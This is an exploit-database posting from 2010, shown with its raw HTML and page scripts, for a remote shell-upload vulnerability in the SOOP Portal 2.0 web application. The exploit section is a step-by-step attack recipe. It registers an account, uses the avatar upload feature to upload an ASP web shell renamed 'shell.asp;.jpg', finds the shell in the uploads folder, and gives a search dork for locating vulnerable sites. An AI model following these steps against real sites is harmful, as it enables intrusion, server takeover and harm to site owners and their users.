[webapps / 0day] - SOOP Portal 2.0 Remote Upload Shell Vulne
Posted on 05 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>SOOP Portal 2.0 Remote Upload Shell Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='SOOP Portal 2.0 Remote Upload Shell Vulnerability by Net.Edit0r in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================= SOOP Portal 2.0 Remote Upload Shell Vulnerability ================================================= ################################################################# # I N F O # Exploit Title: SOOP Portal 2.0 Remote Upload Shell Vulnerability # DDate: 05-12-2010 # Author: Net.Edit0r # Software Link: www.soopportal.com # Version: 2.0 # Tested on: windows server 2008 # Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com [~]######################################### E X P L O I T #############################################[~] # # 1. Register On Site # # 2. http://server/member_form.asp?do=5&mid=4 # # 3. Current avatar [ Browse/Upload ] # # 4. http://server/assetman3.asp?mode=1&ffilter=image # # 4. Asp renamed via the .asp;.jpg (shell.asp;.jpg) # # 5. http://server/uploads/ [You can get the address at the See Shell Shell upload] # # 6. In this section, file in the folder that you have selected in the previous section is placed . # # 7 . Example URL : http://server/uploads/ # # Dork : "SOOP Portal 2.0" # # [~]######################################### ThankS To ... ###########################################[~] # # Special Thanks To : HUrr!c4nE, Cair3x, B3hz4d, M4hd1, Skitt3r,Hussin-v ,Virus_Baghdad ,snIPer alBlDeat # # 7-Team: virangar, H-SK33PY , farzadho ,n3me3iz ,mmilad200 , fr0nk, bLaCk.bytE , Satanic2000 # # BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker ~ Mikili # <a href='http://1337db.com/'>1337db.com</a> [2010-12-05]</pre></body></html>
